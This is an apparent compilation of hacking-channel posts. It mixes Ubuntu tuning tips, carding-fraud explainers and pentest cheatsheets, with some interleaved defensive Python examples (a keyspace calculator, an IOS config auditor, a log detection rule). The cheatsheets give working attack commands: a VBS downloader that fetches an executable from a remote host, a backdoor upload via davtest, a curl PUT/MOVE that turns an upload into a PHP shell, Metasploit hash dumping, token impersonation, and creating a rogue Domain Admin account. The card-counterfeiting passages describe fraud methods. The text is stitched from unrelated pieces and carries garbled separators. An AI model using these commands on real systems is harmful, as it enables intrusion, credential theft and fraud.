UNDERCODE SECURITY
🦑WELCOME TO UNDERCODE TESTING: LEARN HACKING | PROGRAMMING | SECURITY & more..

THIS CHANNEL BY :

@UndercodeTesting
UndercodeTesting.com (official)

@iUndercode
iUndercode.com (iOS)

@Dailycve
DailyCve.com


@UndercodeNews
UndercodeNews.com
5. Use apt-fast instead of apt-get for a speedy update:
apt-fast is a shell script wrapper for “apt-get” that improves update and package download speed by downloading packages over multiple connections simultaneously. If you frequently use the terminal and apt-get to install and update packages, you may want to give apt-fast a try. Install apt-fast via its official PPA using the following commands:

sudo add-apt-repository ppa:apt-fast/stable
sudo apt-get update
sudo apt-get install apt-fast
6. Remove language-related IGN lines from apt-get update:
Have you ever looked at the output of sudo apt-get update? It contains three kinds of lines: Hit, Ign and Get. You can read their meaning here. If you look at the Ign lines, you will find that most of them relate to language translations. If you use all your applications and packages in English, there is no need to translate the package database from English to English.

If you suppress these language-related updates in apt-get, it will slightly increase the speed of apt-get update. To do that, open the following file:

sudo gedit /etc/apt/apt.conf.d/00aptitude
And add the following line at the end of this file:

Acquire::Languages "none";
7. Reduce overheating:
Overheating is a common problem in computers these days. An overheated computer runs quite slowly: it takes ages to open a program when your CPU fan is running like Usain Bolt. There are two tools you can use to reduce overheating, and thus get better system performance in Ubuntu: TLP and CPUFREQ.

To install and use TLP, use the following commands in a terminal:

sudo add-apt-repository ppa:linrunner/tlp
sudo apt-get update
sudo apt-get install tlp tlp-rdw
sudo tlp start
You don't need to do anything after installing TLP. It works in the background.

To install the CPUFREQ indicator, use the following command:

sudo apt-get install indicator-cpufreq
Restart your computer and select Powersave mode in the CPUFREQ indicator applet.
8. Tweak LibreOffice to make it faster:
If you are a frequent user of office products, you may want to tweak the default LibreOffice a bit to make it faster. You will be tweaking the memory options here. Open LibreOffice and go to Tools->Options. There, choose Memory from the left sidebar, enable the Systray Quickstarter and increase the memory allocation.

You can read more about how to speed up LibreOffice in detail.

9. Use a lightweight desktop environment (if you can)
If you installed the default Unity or GNOME desktop environment, you may opt instead for a lightweight desktop environment such as Xfce or LXDE.

These desktop environments use less RAM and consume less CPU. They also come with their own set of lightweight applications that further help Ubuntu run faster. You can refer to this detailed guide to learn how to install Xfce on Ubuntu.

Of course, the desktop might not look as modern as Unity or GNOME. That's a compromise you have to make.

10. Use lighter alternatives for different applications:
This is more a matter of preference. Some of the default or popular applications are resource heavy and may not be suitable for a low-end computer. What you can do is use alternatives to these applications. For example, use AppGrid instead of Ubuntu Software Center, use Gdebi to install packages, use AbiWord instead of LibreOffice Writer, and so on.

That concludes the collection of tips to make Ubuntu 18.04, 16.04 and other versions faster. I am sure these tips will give you better overall system performance.

โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
10 real tips speedup any linux
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

🦑Fake Card Transactions - In Carding :

> This type of fraud accounts for the largest share of payment system losses.

The mechanism of the fraud can vary: a fraudster lawfully obtains a regular card from a bank and deposits the minimum required amount into the card account. He then obtains the necessary information about the holder of a card from the same company but with a larger balance, and writes the data obtained this way onto his own card. To carry out this method of fraud, the offender must obtain the code numbers, surname, first name and patronymic of the cardholder, a specimen signature, and so on.

🦑There are several ways to produce such a forgery:

1) altering the information stored on the magnetic stripe;

2) altering the information embossed (stamped) on the front side;

3) doing both;

4) forging the signature of the legitimate cardholder.

When forging a signature, several options are used, but it has to be taken into account that a signature specimen cannot be erased: an attempt to do so makes the word VOID ("invalid") appear in the signature panel. Therefore it is often simply painted over with white paint.

One of the most dangerous tricks in counterfeiting plastic cards is the production of completely fake cards. Full copying is most widely used in some countries of Southeast Asia. This method is most often used by organized criminal groups which, as a rule, include employees of restaurants and other service establishments; the latter are used to collect information about the credit cards that pass through their hands when customers pay for restaurant and other services.

Card data used in the manufacture of fake credit cards can be collected in various countries around the world. The most commonly used data come from Canada, the United States of America, European countries and the Asian region.

written by Undercode
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
Pentesting With Burp Suite.pdf
🦑Don't waste time, full Burp Suite:

- Intro to Web App Testing
- Scoping with Burp
- Mapping with Burp Spider, Intruder, and Engagement Tools
- Replacing Some good common methodology tasks
- Automated Scanner Breakdown
- Stealing from other tools and Modifying your Attacks
- Fuzzing with Intruder and FuzzDB
- Auth Bruting with Burp Intruder
- Random Burping, IBurpExtender ++
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

🦑Crunch VS Hashcat by Undercode :

Crunch is a wordlist generator in which you can specify a standard or custom character set. Crunch can create a list of words with every combination and permutation that matches the given criteria. The data Crunch produces can be displayed on screen, saved to a file, or piped to another program.

This is a very flexible dictionary generation program.

Hashcat is the world's fastest password recovery tool (cracker), but that function does not interest us here. Hashcat can also generate dictionaries: to show the candidates only, without cracking any passwords, Hashcat has the --stdout option.

Hashcat uses various methods of generating passwords (by mask, combinator, permutation, rule-based attack and others). The most popular is generation by mask.

To avoid confusion in terminology, we will call the character at a given place in the mask or pattern a “position”. For example, the first character of a password candidate is the first position, the second character is the second position, and so on.

Using a mask, we can gain control over each position.

For example, we want to make one of the positions a static character (always the same in all password candidates); Crunch can do that. But we can also use custom character sets for certain positions. For example, we know that the second position contains only the digits 1, 3 and 5. In Hashcat we can create a custom character set containing the digits 1, 3 and 5 and put that custom set in the second position of the mask.

In Crunch there is no concept of a “mask”, but there is the concept of a “pattern”, which is essentially equivalent to a mask. Moreover, Crunch can also define up to four custom character sets. That is, in functionality Crunch is not inferior to Hashcat.

Crunch has a couple of options that are not available in Hashcat. For example, -d lets you specify the maximum number of duplicate characters, and the -p option creates dictionaries without duplicate characters. That is, this program has unique features of its own.

written by Undercode
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–


🦑TOR-BOT UPDATED!

Features

Onion Crawler (.onion). (Completed)
Returns page title and address with a short description about the site. (Partially Completed)
Save links to database. (PR to be reviewed)
Get emails from site. (Completed)
Save crawl info to JSON file. (Completed)
Crawl custom domains. (Completed)
Check if the link is live. (Completed)
Built-in Updater. (Completed)
TorBot GUI (see branch front_end)
Social Media integration. (not Started) ... (will be updated)

INSTALLATION & RUN :

1) Dependencies:

beautifulsoup4
pyinstaller
PySocks
termcolor
requests
requests_mock
yattag

2) Get Tor: TORPROJECT.COM

3) Before you run TorBot, make sure the following things are done properly:

> Run the tor service: sudo service tor start

> Make sure that your torrc is configured with SOCKS_PORT localhost:9050

> Clone https://github.com/DedSecInside/TorBot, then

> Install the TorBot Python requirements: pip3 install -r requirements.txt

4) On Linux platforms, you can make an executable for TorBot by using the install.sh script. You will need to give the script the correct permissions using chmod +x install.sh. Now you can run ./install.sh to create the torBot binary. Run ./torBot to execute the program.

5) An alternative way of running torBot is shown below, along with help instructions.

> python3 torBot.py, or use the -h/--help argument


🦑Operations with stolen or lost cards
#FastTips

The fraudulent use of stolen credit cards remains the most common crime. Methods of counteracting the theft and fraudulent use of plastic cards have been improving for years; however, companies currently prefer to issue inexpensive cards in order to reduce the possible losses from their illegal use. When losses rise sharply, companies make efforts to introduce new security measures.

When a card is stolen while being sent by mail, the peculiarity of the fraud is that the owner does not know the card has been lost. Theft by this method is very difficult to prevent.

Criminals have many ways to use stolen cards. Organized criminal groups pay from 100 to 500 US dollars for a stolen card, depending on whether it is signed, how long ago it was stolen, whether it is on the stolen-card lists, how long the rightful owner used it, whether the limit has been reached, and whether any additional documents or identity cards come with it.


🦑 SYSTEM COMMANDS (Meterpreter) :

clearav - clears the event logs on the victim's computer

drop_token - drops a stolen token

execute - executes a command

getpid - gets the current process ID (PID)

getprivs - gets as many privileges as possible

getuid - gets the user that the server is running as

kill - terminates the process designated by the PID

ps - lists running processes

reboot - reboots the victim computer

reg - interact with the victim's registry

rev2self - calls RevertToSelf() on the victim machine

shell - opens a command shell on the victim machine

shutdown - shuts down the victim's computer

steal_token - attempts to steal the token of a specified (PID) process

sysinfo - gets the details about the victim computer such as OS and name


🦑How to survive inside Kali Linux / Linux in general?

Set the IP address as a variable
export ip=192.168.1.100
nmap -A -T4 -p- $ip

Netcat port Scanning
nc -nvv -w 1 -z $ip 3388-3390

Discover active IPs using ARP on the network:
arp-scan $ip/24

Discover who else is on the network
netdiscover

Discover IP, MAC and MAC vendors from ARP
netdiscover -r $ip/24

Nmap stealth scan using SYN
nmap -sS $ip

Nmap stealth scan using FIN
nmap -sF $ip

Nmap Banner Grabbing
nmap -sV -sT $ip

Nmap OS Fingerprinting
nmap -O $ip

Nmap Regular Scan:
nmap $ip/24

Enumeration Scan
nmap -p 1-65535 -sV -sS -A -T4 $ip/24 -oN nmap.txt

Enumeration Scan All Ports TCP / UDP and output to a txt file
nmap -oN nmap2.txt -v -sU -sS -p- -A -T4 $ip

Nmap output to a file:
nmap -oN nmap.txt -p 1-65535 -sV -sS -A -T4 $ip/24

Quick Scan:
nmap -T4 -F $ip/24

Quick Scan Plus:
nmap -sV -T4 -O -F --version-light $ip/24

Quick traceroute
nmap -sn --traceroute $ip

All TCP and UDP Ports
nmap -v -sU -sS -p- -A -T4 $ip

Intense Scan:
nmap -T4 -A -v $ip

Intense Scan Plus UDP
nmap -sS -sU -T4 -A -v $ip/24

Intense Scan ALL TCP Ports
nmap -p 1-65535 -T4 -A -v $ip/24

Intense Scan - No Ping
nmap -T4 -A -v -Pn $ip/24

Ping scan
nmap -sn $ip/24

Slow Comprehensive Scan
nmap -sS -sU -T4 -A -v -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script "default or (discovery and safe)" $ip/24

Scan with Active connect in order to weed out any spoofed ports designed to troll you
nmap -p1-65535 -A -T5 -sT $ip


🦑====== Enumeration ======

DNS Enumeration

NMAP DNS Hostnames Lookup
nmap -F --dns-server <dns server ip> <target ip range>

Host Lookup
host -t ns megacorpone.com

Reverse Lookup Brute Force - find domains in the same range
for ip in $(seq 155 190);do host 50.7.67.$ip;done |grep -v "not found"

Perform DNS IP Lookup
dig a domain-name-here.com @nameserver

Perform MX Record Lookup
dig mx domain-name-here.com @nameserver

Perform Zone Transfer with DIG
dig axfr domain-name-here.com @nameserver

DNS Zone Transfers
Windows DNS zone transfer

nslookup -> set type=any -> ls -d blah.com

Linux DNS zone transfer

dig axfr blah.com @ns1.blah.com

Dnsrecon DNS Brute Force
dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml output.xml

Dnsrecon DNS List of megacorp
dnsrecon -d megacorpone.com -t axfr

🦑DNSEnum
dnsenum zonetransfer.me

NMap Enumeration Script List:

NMap Discovery
https://nmap.org/nsedoc/categories/discovery.html

Nmap port version detection MAXIMUM power
nmap -vvv -A --reason --script="+(safe or default) and not broadcast" -p <port> <host>

NFS (Network File System) Enumeration

Show Mountable NFS Shares
nmap -sV --script=nfs-showmount $ip

RPC (Remote Procedure Call) Enumeration

Connect to an RPC share without a username and password and enumerate privileges
rpcclient --user="" --command=enumprivs -N $ip

Connect to an RPC share with a username and enumerate privileges
rpcclient --user="<Username>" --command=enumprivs $ip

🦑SMB Enumeration

SMB OS Discovery
nmap $ip --script smb-os-discovery.nse

Nmap port scan
nmap -v -p 139,445 -oG smb.txt $ip-254

Netbios Information Scanning
nbtscan -r $ip/24

Nmap find exposed Netbios servers
nmap -sU --script nbstat.nse -p 137 $ip

🦑Nmap all SMB scripts scan

nmap -sV -Pn -vv -p 445 --script='(smb*) and not (brute or broadcast or dos or external or fuzzer)' --script-args=unsafe=1 $ip

Nmap all SMB scripts authenticated scan

nmap -sV -Pn -vv -p 445 --script-args smbuser=<username>,smbpass=<password> --script='(smb*) and not (brute or broadcast or dos or external or fuzzer)' --script-args=unsafe=1 $ip



🦑List all SUID files
find / -perm -4000 2>/dev/null

Determine the current version of Linux
cat /etc/issue

Determine more information about the environment
uname -a

List processes running
ps -xaf

List the allowed (and forbidden) commands for the invoking user
sudo -l

List iptables rules
iptables --table nat --list
iptables -vL -t filter
iptables -vL -t nat
iptables -vL -t mangle
iptables -vL -t raw
iptables -vL -t security


Windows host enumeration (from a command prompt)

net config Workstation

systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

hostname

net users

ipconfig /all

route print

arp -A

netstat -ano

netsh firewall show state

netsh firewall show config

schtasks /query /fo LIST /v

tasklist /SVC

net start




🦑Simple Local Web Servers

1๏ธโƒฃRun a basic http server, great for serving up shells etc
python -m SimpleHTTPServer 80

2๏ธโƒฃRun a basic Python3 http server, great for serving up shells etc
python3 -m http.server

3๏ธโƒฃRun a ruby webrick basic http server
ruby -rwebrick -e "WEBrick::HTTPServer.new
(:Port => 80, :DocumentRoot => Dir.pwd).start"

4๏ธโƒฃRun a basic PHP http server
php -S $ip:80

5๏ธโƒฃCreating a wget VB Script on Windows:
https://github.com/erik1o6/oscp/blob/master/wget-vbs-win.txt

6๏ธโƒฃWindows file transfer script that can be pasted to the command line. File transfers to a Windows machine can be tricky without a Meterpreter shell. The following script can be copied and pasted into a basic windows reverse and used to transfer files from a web server (the timeout 1 commands are required after each new line):

7๏ธโƒฃ echo Set args = Wscript.Arguments >> webdl.vbs
timeout 1

echo Url = "http://1.1.1.1/windows-privesc-check2.exe" >> webdl.vbs
timeout 1

echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") >> webdl.vbs
timeout 1

echo dim bStrm: Set bStrm = createobject("Adodb.Stream") >> webdl.vbs
timeout 1

echo xHttp.Open "GET", Url, False >> webdl.vbs
timeout 1

echo xHttp.Send >> webdl.vbs
timeout 1

echo with bStrm >> webdl.vbs
timeout 1

echo .type = 1 ' >> webdl.vbs
timeout 1

echo .open >> webdl.vbs
timeout 1

echo .write xHttp.responseBody >> webdl.vbs
timeout 1

echo .savetofile "C:\temp\windows-privesc-check2.exe", 2 ' >> webdl.vbs
timeout 1

echo end with >> webdl.vbs
timeout 1
echo

8๏ธโƒฃThe file can be run using the following syntax:

C:\temp\cscript.exe webdl.vbs

Mounting File Shares

Mount NFS share to /mnt/nfs
mount $ip:/vol/share /mnt/nfs

HTTP PUT
nmap -p80 $ip --script http-put --script-args http-put.url='/test/sicpwn.php',http-put.file='/var/www/html/sicpwn.php'


🦑Uploading Files
SCP

1) scp username1@sourcehost:directory1/filename1 username2@destinationhost:directory2/filename2

2) scp localfile username@$ip:~/Folder/

3) scp LinuxExploitSuggester.pl bob@192.168.1.10:~

4) WebDAV with Davtest - some sysadmins are kind enough to enable the PUT method - this tool will auto upload a backdoor

5) davtest -move -sendbd auto -url http://$ip

https://github.com/cldrn/davtest

6) You can also upload a file using the PUT method with the curl command:

curl -T 'leetshellz.txt' 'http://$ip'

7) And rename it to an executable file using the MOVE method with the curl command:

curl -X MOVE --header 'Destination:http://$ip/leetshellz.php' 'http://$ip/leetshellz.txt'

🦑TFTP
mkdir /tftp
atftpd --daemon --port 69 /tftp
cp /usr/share/windows-binaries/nc.exe /tftp/
Example from a Windows host:
C:\Users\Offsec>tftp -i $ip get nc.exe

FTP
apt-get update && apt-get install pure-ftpd

#!/bin/bash
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pw useradd offsec -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/

/etc/init.d/pure-ftpd restart


🦑PSK-Crack :

Brute force:

$ psk-crack -b 5 192-168-207-134key
Running in brute-force cracking mode
Brute force with 36 chars up to length 5 will take up to 60466176 iterations

no match found for MD5 hash 5c178dSNIP
Ending psk-crack: 60466176 iterations in 138.019 seconds (438099.56 iterations/sec)

The default charset is "0123456789abcdefghijklmnopqrstuvwxyz"; it can be changed with --charset=

$ psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key
Running in brute-force cracking mode
Brute force with 63 chars up to length 5 will take up to 992436543 iterations

----------------------------------------------------------------------------------------------------------------------------------

Dictionary attack:

$ psk-crack -d /path/to/dictionary 192-168-207-134key
Running in dictionary cracking mode

no match found for MD5 hash 5c178dSNIP
Ending psk-crack: 14344876 iterations in 33.400 seconds (429483.14 iterations/sec)
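The mask and “position” concepts from the Crunch vs Hashcat post above and the iteration counts psk-crack prints here (36^5 = 60466176 and 63^5 = 992436543) come down to the same arithmetic: the keyspace is the product of the character-set sizes at each position. The Python below is an added example, not code from Hashcat, Crunch or psk-crack. It parses a Hashcat-style mask with custom sets, counts or enumerates the candidates, and turns a measured rate into a worst-case time to exhaust the space, which is the number to use when judging whether a password policy or an IKE pre-shared key stands up to the rates shown above. The mask syntax (?l ?u ?d ?s ?a and ?1 to ?4) is Hashcat's; the function names are my own.

```python
# Added example (not Hashcat, Crunch or psk-crack code): keyspace arithmetic
# for masks and fixed-length brute force, as a defender would use it to size
# a policy against a measured candidate rate.
import itertools
import string

# Hashcat's built-in charsets: ?l ?u ?d ?s, with ?a as their union (95 chars).
BUILTIN_CHARSETS = {
    "l": string.ascii_lowercase,
    "u": string.ascii_uppercase,
    "d": string.digits,
    "s": " " + string.punctuation,
}
BUILTIN_CHARSETS["a"] = "".join(BUILTIN_CHARSETS[k] for k in "luds")


def parse_mask(mask, custom=None):
    """Expand a Hashcat-style mask into one charset string per position.

    '?l' etc. are built-in sets, '?1'..'?4' are caller-supplied custom sets
    (passed as {"1": "135"}), '??' is a literal question mark, and any other
    character is static: the same in every candidate.
    """
    custom = custom or {}
    positions = []
    i = 0
    while i < len(mask):
        ch = mask[i]
        if ch != "?":
            positions.append(ch)
            i += 1
            continue
        if i + 1 >= len(mask):
            raise ValueError("mask ends with a dangling '?'")
        key = mask[i + 1]
        if key == "?":
            positions.append("?")
        elif key in BUILTIN_CHARSETS:
            positions.append(BUILTIN_CHARSETS[key])
        elif key in custom:
            positions.append(custom[key])
        else:
            raise ValueError(f"unknown charset ?{key}")
        i += 2
    return positions


def keyspace(mask, custom=None):
    """Number of candidates the mask produces: the product of the set sizes.

    A repeated character inside a set is counted twice, which is exactly why
    the psk-crack charset above with its doubled '3' is reported as 63 chars.
    """
    total = 1
    for charset in parse_mask(mask, custom):
        total *= len(charset)
    return total


def candidates(mask, custom=None):
    """Yield every candidate; the rightmost position varies fastest."""
    for combo in itertools.product(*parse_mask(mask, custom)):
        yield "".join(combo)


def brute_force_keyspace(charset, length):
    """Candidates of one fixed length over a single charset (what the
    psk-crack -b output above reports as 'up to N iterations')."""
    return len(charset) ** length


def seconds_to_exhaust(total, rate_per_second):
    """Worst-case time to try every candidate at a measured rate."""
    return total / rate_per_second


if __name__ == "__main__":
    # The post's example: the second position holds only 1, 3 or 5.
    custom = {"1": "135"}
    mask = "?l?1?l?l?d?d"
    print(mask, "->", keyspace(mask, custom), "candidates; first three:",
          list(itertools.islice(candidates(mask, custom), 3)))
    # The psk-crack figures quoted above, at its printed 438099.56 iterations/s.
    default = "0123456789abcdefghijklmnopqrstuvwxyz"
    total = brute_force_keyspace(default, 5)
    print(total, "candidates ->", round(seconds_to_exhaust(total, 438099.56), 1), "seconds")
```

Plugging a proposed policy shape into keyspace() and the rate a cracker actually reaches against your hash type gives the honest worst case; the 138 seconds printed for the 36-character, 5-position space is why a short alphanumeric PSK offers no protection against the offline attack the reference at the end of this post describes.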

--------------------------------------------------------------------------------------------

References: http://carnal0wnage.attackresearch.com/2011/12/aggressive-mode-vpn-ike-scan-psk-crack.html

โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

🦑Cisco IOS Command Line Cheatsheet
---------------------------------

--- Verify Basic Configuration:

Shows information about the switch and its interfaces, RAM, NVRAM, flash, IOS, etc.
SW1# show version

Shows the current configuration file stored in DRAM.
SW1# show running-config

Shows the configuration file stored in NVRAM which is used at first boot process.
SW1# show startup-config

Lists the commands currently held in the history buffer.
SW1# show history

Shows an overview of all interfaces, their physical status, protocol status and ip address if assigned.
SW1# show ip interface brief

Shows detailed information about the specified interface, its status, protocol, duplex, speed, encapsulation, last 5 min traffic.
SW1# show interface vlan 1

Shows the description of all interfaces
SW1# show interfaces description

Shows the status of all interfaces like connected or not, speed, duplex, trunk or access vlan.
SW1# show interfaces status

Shows the public encryption key used for SSH.
SW1# show crypto key mypubkey rsa

Shows information about the leased IP address (when an interface is configured to get IP address via a dhcp server)
SW1# show dhcp lease

Show the router's routing table. List of all networks that the router can reach.
Router# show ip route

--- Router Modes:

Router>: User mode = Limited to basic monitoring commands
Router#: Privileged mode (exec-level mode) = Provides access to all other router commands
Router(config)#: global configuration mode = Commands that affect the entire system
Router(config-if)#: interface mode = Commands that affect interfaces
Router(config-subif)#: subinterface mode = Commands that affect subinterfaces
Router(config-line)#: line mode = Commands that affect lines (console, vty, aux…)
Router(config-router)#: router configuration mode

--- Changing switch hostname:

Switch(config)# hostname SW1

--- Configuring passwords:

SW1(config)# enable secret cisco ! MD5 hash
SW1(config)# enable password notcisco ! Clear text

--- Securing console port:

SW1(config)# line con 0
SW1(config-line)# password cisco
SW1(config-line)# login

--- Securing terminal lines:

SW1(config)# line vty 0 4
SW1(config-line)# password cisco
SW1(config-line)# login

--- Encrypting passwords:

SW1(config)# service password-encryption
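The difference between "enable secret" (hashed) and "enable password" (clear text), and what "service password-encryption" does and does not protect, is easy to lose track of once a configuration has grown. The Python below is an added example, not from the cheatsheet and not a Cisco tool: it audits an IOS-style running configuration for exactly these settings. Both sample configurations are constructed; the first is what the commands above leave behind when typed verbatim, the second the hardened counterpart. The caveat it encodes: the type 7 strings that service password-encryption produces are reversible obfuscation, not hashes, so they only defeat shoulder-surfing, and an "enable password" should be removed rather than kept beside the secret.

```python
# Added example (not cheatsheet or Cisco code): audit password storage in an
# IOS-style configuration. Sample configs are constructed.
import re

# Constructed: the "Configuring passwords" and line commands above, typed
# verbatim (clear-text enable password, clear-text line passwords).
WEAK_CONFIG = """\
hostname SW1
enable secret 5 $1$EXMP$placeholderhashvalue
enable password notcisco
line con 0
 password cisco
 login
line vty 0 4
 password cisco
 login
"""

# Constructed: the same device after dropping 'enable password' and enabling
# service password-encryption, which stores line passwords as type 7.
HARDENED_CONFIG = """\
hostname SW1
service password-encryption
enable secret 5 $1$EXMP$placeholderhashvalue
line con 0
 password 7 0822455D0A16
 login
line vty 0 4
 password 7 0822455D0A16
 login
"""

# 'password [type] value' inside a line block; 'enable secret|password [type] value'.
PASSWORD_RE = re.compile(r"password(?: (\d))? (\S+)$")
ENABLE_RE = re.compile(r"enable (secret|password)(?: (\d))? (\S+)$")


def audit_ios_config(config_text):
    """Return (severity, message) findings about how passwords are stored."""
    findings = []
    lines = [ln.rstrip() for ln in config_text.splitlines() if ln.strip()]
    encryption_on = any(ln.strip() == "service password-encryption" for ln in lines)
    has_enable_secret = False
    section = None  # most recent top-level command, e.g. 'line vty 0 4'
    for line in lines:
        if not line.startswith(" "):
            section = line.strip()
        stripped = line.strip()
        m = ENABLE_RE.match(stripped)
        if m:
            kind, ptype, _ = m.groups()
            if kind == "password":
                findings.append(("high", "'enable password' is set (clear text or type 7); "
                                         "remove it and rely on 'enable secret'"))
            else:
                has_enable_secret = True
                if ptype == "5":
                    findings.append(("info", "'enable secret' uses type 5 (MD5); prefer "
                                             "type 8 or 9 where the IOS release supports them"))
            continue
        m = PASSWORD_RE.match(stripped)
        if m and section and section.startswith("line "):
            ptype, _ = m.groups()
            if ptype == "7":
                findings.append(("medium", f"{section}: type 7 password is reversible "
                                           "obfuscation, not a hash"))
            elif ptype in (None, "0"):
                findings.append(("high", f"{section}: password stored in clear text"))
    if not has_enable_secret:
        findings.append(("high", "no 'enable secret' configured"))
    if not encryption_on:
        findings.append(("medium", "service password-encryption is off: line passwords "
                                   "are shown in clear text"))
    return findings


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(f"== {name} ==")
        for severity, message in audit_ios_config(cfg):
            print(f"[{severity}] {message}")
```

Run it against the text of "show running-config"; the hardened sample still yields medium findings on purpose, because a line password of any type is weaker than "login local" with per-user secrets, which the cheatsheet does not cover.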

--- Configuring banners:

SW1(config)# banner motd $
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
UNAUTHORIZED ACCESS IS PROHIBITED
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
$

--- Giving the switch an IP address:

SW1(config)# interface vlan 1
SW1(config-if)# ip address 172.16.1.11 255.255.255.0 ! or DHCP
SW1(config-if)# no shutdown

--- Setting the default gateway:

SW1(config)# ip default-gateway 172.16.1.1

--- Saving configuration:

SW1# copy running-config startup-config
Destination filename startup-config? ! Press enter to confirm file name.
Building configuration…
OK

! Short for write memory.
SW1# wr
Building configuration…
OK


🦑[+] After compromising a Windows machine:

[>] List the domain administrators:
From Shell - net group "Domain Admins" /domain


[>] Dump the hashes (Metasploit)
msf > run post/windows/gather/smart_hashdump GETSYSTEM=FALSE

[>] Find the admins (Metasploit)
spool /tmp/enumdomainusers.txt
msf > use auxiliary/scanner/smb/smb_enumusers_domain
msf > set smbuser Administrator
msf > set smbpass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
msf > set rhosts 10.10.10.0/24
msf > set threads 8
msf > run

msf> spool off

[>] Compromise the admin's box
meterpreter > load incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token MYDOM\\administrator
meterpreter > getuid
meterpreter > shell

C:\> whoami
mydom\administrator
C:\> net user hacker /add /domain
C:\> net group "Domain Admins" hacker /add /domain
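The two net commands at the end are where a defender gets a reliable signal: on the domain controller, the account creation is logged as Security event 4720 and the addition to Domain Admins (a global group) as 4728, with 4732 and 4756 covering local and universal groups. The Python below is an added example, not part of the cheatsheet and not Metasploit code. It runs two detection rules over constructed sample records whose field names are simplified the way a log pipeline might normalise them (they are not the raw Windows XML names): any addition to a privileged group, and an account that is created and then added to a group within a short window.

```python
# Added example (not cheatsheet or Metasploit code): detection rules for
# account creation followed by privileged group membership, over constructed
# Security-log records with simplified field names.
from datetime import datetime, timedelta

PRIVILEGED_GROUPS = {"domain admins", "enterprise admins", "schema admins", "administrators"}
# Member-added events by group scope: 4728 global, 4732 local, 4756 universal.
GROUP_ADD_EVENT_IDS = {4728: "global", 4732: "local", 4756: "universal"}

# Constructed sample: the sequence from the cheatsheet (hacker) beside an
# ordinary onboarding (jdoe) and a direct privileged addition (svc_backup).
SAMPLE_EVENTS = [
    {"time": "2024-05-01T10:00:05", "event_id": 4720, "subject": "MYDOM\\administrator",
     "target_account": "MYDOM\\hacker"},
    {"time": "2024-05-01T10:00:09", "event_id": 4728, "subject": "MYDOM\\administrator",
     "member": "MYDOM\\hacker", "group": "Domain Admins"},
    {"time": "2024-05-01T11:30:00", "event_id": 4720, "subject": "MYDOM\\hr_admin",
     "target_account": "MYDOM\\jdoe"},
    {"time": "2024-05-01T15:45:00", "event_id": 4728, "subject": "MYDOM\\hr_admin",
     "member": "MYDOM\\jdoe", "group": "Sales"},
    {"time": "2024-05-01T16:00:00", "event_id": 4732, "subject": "MYDOM\\it_admin",
     "member": "MYDOM\\svc_backup", "group": "Administrators"},
]


def detect_account_abuse(events, window=timedelta(minutes=10)):
    """Apply two rules over a stream of 4720/4728/4732/4756 records.

    1. Any membership added to a privileged group is reported (high).
    2. An account created and added to any group within `window` is reported,
       because legitimate onboarding rarely happens that fast (high if the
       group is privileged, otherwise medium).
    """
    created_at = {}   # lower-cased account -> creation timestamp
    findings = []
    for ev in sorted(events, key=lambda e: e["time"]):
        ts = datetime.fromisoformat(ev["time"])
        if ev["event_id"] == 4720:
            created_at[ev["target_account"].lower()] = ts
            continue
        if ev["event_id"] not in GROUP_ADD_EVENT_IDS:
            continue
        member, group = ev["member"], ev["group"]
        privileged = group.lower() in PRIVILEGED_GROUPS
        base = {"member": member, "group": group, "by": ev["subject"],
                "time": ev["time"], "scope": GROUP_ADD_EVENT_IDS[ev["event_id"]]}
        if privileged:
            findings.append({"rule": "privileged_group_membership_added",
                             "severity": "high", **base})
        born = created_at.get(member.lower())
        if born is not None and ts - born <= window:
            findings.append({"rule": "new_account_fast_tracked_into_group",
                             "severity": "high" if privileged else "medium", **base})
    return findings


if __name__ == "__main__":
    for f in detect_account_abuse(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['rule']}: {f['member']} -> {f['group']} "
              f"({f['scope']}) by {f['by']} at {f['time']}")
```

The first rule fires on its own for any privileged-group change and needs an allow-list of change windows or ticket references to stay quiet in practice; the second is the one that separates the cheatsheet's four-second create-and-promote from a real onboarding.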
